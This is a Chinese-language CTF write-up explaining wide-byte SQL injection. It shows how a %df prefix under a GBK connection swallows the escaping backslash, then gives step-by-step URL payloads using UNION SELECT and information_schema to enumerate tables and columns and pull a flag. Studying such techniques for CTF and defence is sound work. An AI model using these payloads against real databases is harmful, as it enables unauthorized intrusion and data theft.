宽字节注入用途

主要就是在一些SQL语句中，有的后台代码会把参数中的特殊字符进行转义，从而达到防守的目的。
例如原语句是select id,title from news where id = '1'
当把id传值为1’时，SQL语句就会变为11select id,title from news where id = '1\''，这个时候如果想要绕过是很困难的，而且这个单引号非敲不可，这时宽字节注入就派上了用场。
可以传入%df’
由于加上\和url编码，原参数会变为

%df%5c%27

这里因为%df的关系，\的编码%5c被吃掉了，也就失去了转义的效果，直接被带入到mysql中，然后mysql在解读时无视了%df%5c形成的新字节，那么单引号便重新发挥了效果.

这里因为

mysql_query(“SET NAMES gbk”);

当这行代码在代码层被写入时，三个字符集（客户端、连接层、结果集）都是GBK编码。
那么便会发生如上的情况。
总之就是%df%5c%27被转码了。
例如这题：

传入1’

对参数进行了转义
接着就用宽字节注入
?id=1%df%27
报错

报错了，就可以注入了
！！！虽然这里有个中文字符，但是这不影响查询，前提是数字在前
经过尝试，发现还过滤了#
?id=-1%df%27%20union%20select%201,2--+

显示的是2
然后我们进行查库
?id=-1%df%27%20union%20select%201,database()--+

查表名
?id=-1%df%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

查列名
?id=-1%df%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634--+

这里用十六进制是因为单引号被转义
查数据
?id=-1%df%27%20union%20select%201,group_concat(flag)%20from%20ctf4--+
这就拿到了flag

总结

1、学会宽字节注入的原理
2、知道中文字符和数字结合时，数字在前会去取出数字
3、字符串用16进制代替